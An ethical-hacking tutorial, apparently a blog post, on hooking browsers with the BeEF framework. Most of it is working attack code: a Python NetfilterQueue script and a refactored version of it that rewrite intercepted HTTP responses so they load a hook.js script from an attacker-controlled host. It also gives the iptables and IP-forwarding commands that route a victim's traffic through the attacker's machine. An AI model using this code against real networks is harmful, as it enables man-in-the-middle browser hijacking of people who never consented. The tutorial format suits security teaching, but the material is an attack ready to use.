Python Ethical Hacking - BeEF Framework(1)
- Browser Exploitation Framework.
- Lets us launch a number of attacks against a hooked target browser.
- A target is hooked as soon as its browser loads the hook JavaScript served by BeEF (hook.js).
- The hook code can be placed in an HTML page that is then shared with the target.
- Or the page can be hosted online and its URL sent to the target.
Install the BeEF framework from GitHub and start the service.
Log in to the BeEF web UI with the username and password you changed from the defaults.
Once the login succeeds you are in the BeEF Control Panel.
Change the default index page of the web server on Kali Linux so that it includes the hook script, and save it.
Browse to the Kali web page from other computers, then watch the Control Panel: those browsers show up as hooked (online) targets.
Update the injection code in the packet-rewriting Python script so that it injects the BeEF hook.js script into HTTP responses:
```python
#!/usr/bin/env python
import re

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import TCP, IP
from scapy.packet import Raw

# Address of the machine running BeEF; hook.js is served by BeEF on port 3000.
injection_code = b'<script src="http://10.0.0.43:3000/hook.js"></script>'


def set_load(packet, load):
    """Replace the TCP payload and drop the length/checksum fields so scapy
    recalculates them when the packet is rebuilt."""
    packet[Raw].load = load
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    # scapy_packet.show()
    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
        load = scapy_packet[Raw].load
        if scapy_packet[TCP].dport == 80:
            print("[+] Request")
            # Strip Accept-Encoding so the server answers with uncompressed HTML.
            load = re.sub(rb"Accept-Encoding:.*?\r\n", b"", load)
        elif scapy_packet[TCP].sport == 80:
            print("[+] Response")
            # Only rewrite HTML responses that carry </body> in this segment.
            if b"text/html" in load and b"</body>" in load:
                load = load.replace(b"</body>", injection_code + b"</body>", 1)
                content_length_search = re.search(rb"Content-Length:\s*(\d+)", load)
                if content_length_search:
                    print(content_length_search)
                    content_length = content_length_search.group(1)
                    new_content_length = int(content_length) + len(injection_code)
                    # Patch only the matched header value, not every occurrence of the digits.
                    start, end = content_length_search.span(1)
                    load = load[:start] + str(new_content_length).encode() + load[end:]
        if load != scapy_packet[Raw].load:
            print("Payload")
            new_packet = set_load(scapy_packet, load)
            # bytes(), not str().encode(): str() gives scapy's summary text, not the raw packet.
            packet.set_payload(bytes(new_packet))
    packet.accept()


queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print('')
```
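The HTTP rewriting that the script performs (drop Accept-Encoding on the request, insert the hook before </body> and correct Content-Length on the response) is easier to reason about, and to test, when it is separated from the packet plumbing. The following is an added example, not code from the original post: the same logic as pure functions over raw HTTP bytes, run offline on constructed request/response samples. HOOK_URL and the sample messages are assumptions for this example; the functions also refuse the cases the inline version gets wrong (non-HTML bodies, chunked transfer encoding, a segment that does not contain </body>).

```python
#!/usr/bin/env python3
# Added example (not from the original post): the HTTP rewriting done by the
# NetfilterQueue script above, as pure functions that run offline on
# constructed bytes. HOOK_URL and the sample messages are assumptions.
import re

HOOK_URL = b"http://10.0.0.43:3000/hook.js"          # assumed BeEF hook address
INJECTION = b'<script src="' + HOOK_URL + b'"></script>'


def strip_accept_encoding(request: bytes) -> bytes:
    """Remove Accept-Encoding from a request so the server replies with
    uncompressed HTML that can be searched for </body>."""
    return re.sub(rb"(?i)Accept-Encoding:[^\r\n]*\r\n", b"", request, count=1)


def inject_hook(response: bytes) -> bytes:
    """Insert the hook <script> before </body> of an HTML response and fix
    Content-Length so the browser neither truncates the page nor hangs.
    Returns the response unchanged whenever a safe rewrite is not possible."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return response  # headers and body are not both in this segment
    if not re.search(rb"(?im)^Content-Type:[^\r\n]*text/html", head):
        return response  # only rewrite HTML
    if re.search(rb"(?im)^Transfer-Encoding:[^\r\n]*chunked", head):
        return response  # adding bytes inside a chunk would break chunk framing
    new_body = body.replace(b"</body>", INJECTION + b"</body>", 1)
    if new_body == body:
        return response  # no </body> here: leave the headers untouched too
    m = re.search(rb"(?im)^Content-Length:[ \t]*(\d+)", head)
    if m:
        new_len = int(m.group(1)) + len(INJECTION)
        # Patch only the matched header value, not every copy of those digits.
        head = head[:m.start(1)] + str(new_len).encode() + head[m.end(1):]
    return head + sep + new_body


def rewrite_http(payload: bytes, to_server: bool) -> bytes:
    """Dispatcher in the shape process_packet() needs: requests (dport 80)
    lose Accept-Encoding, responses (sport 80) get the hook injected."""
    return strip_accept_encoding(payload) if to_server else inject_hook(payload)


# Constructed sample traffic for a stand-alone run (40-byte HTML body).
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
                  b"Accept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\n\r\n")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                   b"Content-Length: 40\r\n\r\n"
                   b"<html><body><p>hello</p></body></html>\r\n")

if __name__ == "__main__":
    print(rewrite_http(SAMPLE_REQUEST, to_server=True).decode())
    print(rewrite_http(SAMPLE_RESPONSE, to_server=False).decode())
```

Two limits carry over from the script itself: the rewrite only works when the headers and the `</body>` tag arrive in the same TCP segment (larger pages need stream reassembly, e.g. a transparent proxy), and it only touches plain HTTP on port 80; TLS-protected responses cannot be modified this way.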
Execute the following commands on Kali Linux as root. They hand every forwarded packet to NFQUEUE number 0 (the queue the script binds to) and enable IP forwarding. The target's traffic must already pass through the Kali machine (for example via ARP spoofing), and only plain HTTP on port 80 is modified.

```bash
iptables --flush
iptables -I FORWARD -j NFQUEUE --queue-num 0
echo 1 > /proc/sys/net/ipv4/ip_forward
```
Log in to the BeEF Control Panel and go to the Commands page.